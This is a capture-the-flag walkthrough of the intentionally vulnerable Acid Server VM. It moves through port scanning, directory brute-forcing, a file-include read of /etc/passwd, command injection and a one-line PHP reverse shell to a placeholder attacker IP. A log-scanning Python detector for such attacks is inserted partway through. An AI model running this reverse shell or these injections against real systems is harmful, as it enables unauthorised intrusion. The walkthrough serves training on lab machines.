Acid Server is a web-based vulnerable virtual machine which was designed like a CTF (Capture The Flag) for pentesters. If you are interested in web-based exploits, then you are in the right place. The description of ACID Server on Vulnhub is as follows:

Welcome to the world of Acid.

Fairy tails uses secret keys to open the magical doors.

ACID server download links: Vulnhub Server | SYDL Server | Torrent

CTF Goal :

Boot2Root (Gain root access)

Requirements :


  1. VMware or VirtualBox
  2. Netdiscover
  3. Nmap
  4. DirBuster
  5. Netcat
  6. Knowledge of webshells
  7. Internet connection (for googling)

Step 1 :

First of all, we don’t know the IP of the ACID server, so we use the utility called netdiscover.

《ACID Server VM Walkthrough》

From netdiscover we learn that the IP of the ACID server is 192.168.207.129.

Step 2 :

Now let’s scan all the ports of this machine (well, this would take a lot of time, so a little advice: run it and have a cup of coffee).

《ACID Server VM Walkthrough》

(Oh! The coffee was great.) Looks like it took 6250 seconds.

《ACID Server VM Walkthrough》

The nmap results show that port 33447 is open, running an HTTP service.

Step 3 :

Now let’s open it in a browser.

《ACID Server VM Walkthrough》

The server’s home page is shown, with a path in the title.


If we view the source of this page, we get the first flag.

Step 4 :

Now let’s go to the path that was mentioned in the title (http://192.168.207.129:33447/Challenge/); we would get the following page.

《ACID Server VM Walkthrough》

Oops!!! We don’t know the email or the password. What should we do? Let’s ask the developers 🙂 They are a big help in understanding the code.

First of all, let’s go to the source code of the page.

《ACID Server VM Walkthrough》

We would get the above page, showing all the HTML, JavaScript and CSS code of that page.

Let’s check them one by one, and eventually we would land on the forms.js page. It’s a JavaScript file which contains the creator’s name and website.


《ACID Server VM Walkthrough》

Now that we have the name of the creators (peredur.net), let’s start googling it. We would get a GitHub page of the company/creators. If we read through the GitHub page, we would find a dummy email and password.

《ACID Server VM Walkthrough》

Let’s try out the dummy email and password in the login page, and we would get a successful login page.

《ACID Server VM Walkthrough》

Step 5 :

Let’s proceed further: when we click “Click Here to Proceed Further”, we would land on the following page.

《ACID Server VM Walkthrough》

It asks for a file name, so we can view any file we want that is readable by www-data (the web server’s user). But the most relevant thing is to know the list of users present on the system, so let’s hunt for the passwd file.

《ACID Server VM Walkthrough》

When we give the path of the passwd file, we seemingly get “nothing”. Don’t get confused here!!

《ACID Server VM Walkthrough》

The output is hidden in plain view; we just need to read between the lines. So let’s look at the HTML (view source).

《ACID Server VM Walkthrough》

Yoooo!!!! We got two useful usernames: acid and saman.


Step 6 :

Now that we are done with the include page, let’s enumerate more files and folders in the current folder, i.e., Challenge.

Here we would use the tool provided by OWASP called DirBuster.

Note: DirBuster is very noisy (it sends thousands of requests, each of which lands in the web server’s access log).

This would also take quite a while, so let’s go and listen to a song which is one of my favourites (it’s a Japanese song), Binks’ Sake.

《ACID Server VM Walkthrough》

Looks like we got some results.

So, let’s move on to cake.php, and we should get the following page.


《ACID Server VM Walkthrough》

If we look carefully at the title of this page, we see a path, i.e., /Magic_Box. But sadly it’s inaccessible.

《ACID Server VM Walkthrough》

Step 7 :

Let’s again rely on our noisy tool DirBuster. This time we would run it on Magic_Box. Now let’s not be idle, and watch a crazy song, “Crazy Frog”.

《ACID Server VM Walkthrough》

Looks like DirBuster raided the folder and gave us some very nice results.

Let’s check the command.php page.

《ACID Server VM Walkthrough》

Yoooohhhoooo!!!! Great page, right? This page is a jackpot for hackers. Let’s play some old-school tricks.

《ACID Server VM Walkthrough》

The result is again hidden in plain view.

《ACID Server VM Walkthrough》

Yupee!! It’s injectable. So let’s try creating a reverse shell using PHP. We can get it from Google when we search for “one line simple php reverse shell”. Well, I tried many codes, but the best was:

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
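From the defender’s side, both web bugs used so far (the file-include page of Step 5 and the injectable command.php here) leave distinctive traces in the web server’s access log. The following Python script is an added example, not part of the original walkthrough: it scans constructed Apache-style log lines for traversal sequences, absolute system-file paths and shell metacharacters in query-string values. The script names and the file= / host= parameter names are assumptions; the walkthrough does not show them.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache-style access-log lines (not taken from the walkthrough). The
# include.php / command.php names and the file= / host= parameters are assumptions.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Challenge/index.php HTTP/1.1" 200 1432
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /Challenge/include.php?file=/etc/passwd HTTP/1.1" 200 2301
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /Challenge/include.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2301
10.0.0.5 - - [01/Jan/2024:10:00:42 +0000] "GET /Challenge/Magic_Box/command.php?host=127.0.0.1%3Bid HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /Challenge/Magic_Box/command.php?host=127.0.0.1 HTTP/1.1" 200 480
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                    # ../ or ..\ in a value
SENSITIVE_RE = re.compile(r'^/(etc|proc|root|var/log)/')  # absolute system path
SHELL_META_RE = re.compile(r'[;|&`]|\$\(')                # separators / $(...)

def query_values(query):
    """Split the raw query on '&' and decode each value twice so that a
    double-encoded traversal (%252e%252e%2F) is still visible."""
    for pair in query.split('&'):
        yield unquote(unquote(pair.partition('=')[2]))

def classify(line):
    """Return the set of detection tags that apply to one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return set()                       # not a request line we understand
    tags = set()
    for value in query_values(urlsplit(m.group(3)).query):
        if TRAVERSAL_RE.search(value) or SENSITIVE_RE.match(value):
            tags.add("lfi")
        if SHELL_META_RE.search(value):
            tags.add("cmd-injection")
    return tags

def scan(log_text):
    """Return (client, path, sorted tags) for every line that triggered a tag."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = REQUEST_RE.match(line)
            hits.append((m.group(1), urlsplit(m.group(3)).path, sorted(tags)))
    return hits

if __name__ == "__main__":
    for client, path, tags in scan(SAMPLE_LOG):
        print(f"{client} {path} {','.join(tags)}")
```

Run against a real log, the hit list is what you would feed into an alert; note that a DirBuster run (Step 6) shows up as a burst of 404s from one client rather than as a tag from this script.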

Before going to the webshell, we set up the Swiss army knife, i.e., netcat, to listen on the attacker’s machine.

《ACID Server VM Walkthrough》

Now let’s start the webshell.

《ACID Server VM Walkthrough》

We would get a reverse connection on the listening port of netcat (if everything is filled in correctly).

《ACID Server VM Walkthrough》

Now let’s get a TTY shell by using the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

《ACID Server VM Walkthrough》

Now, finally, we need to get root access. So we would look for something that would be useful for gaining root, like sudo users. Let’s see if we can change user (as we already know who the users on this system are).

《ACID Server VM Walkthrough》

Nice, we can change user. As we don’t know the password, let’s search for it. Now, where can we find the user’s password? Let’s play around for a while.

First, let’s see what files are present on the system and look for suspicious files (ones that should not normally be present in the root directory, /).

《ACID Server VM Walkthrough》

Well, in root (/) we find s.bin to be suspicious; let’s check it out.

《ACID Server VM Walkthrough》

Oh! We found something: investigate.php. Let’s see what it has to say.

《ACID Server VM Walkthrough》

Nice, let’s become investigators and check out the other files that are culprits. Let’s check what is present in the original sbin.

《ACID Server VM Walkthrough》

In sbin, raw_vs_isi looks different. What is it? Let’s check it out.

《ACID Server VM Walkthrough》

Oh! We found a hint. What’s in the .pcapng? What should we do? Let’s run strings on it.

《ACID Server VM Walkthrough》

Hurreee!!! We found something. Let’s check it out.

《ACID Server VM Walkthrough》

This is creepy! “saman and now a days he’s … 1337hax0r”. We know that saman is the user, but what is 1337hax0r? Let’s try it as a password.

《ACID Server VM Walkthrough》

Nice, it works!!! Now we just need to escalate privileges.

Congrats!!! victory…

Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho

Binkusu no sake wo, todoke ni yuku yo ……

I hope you enjoyed the journey; please leave some comments.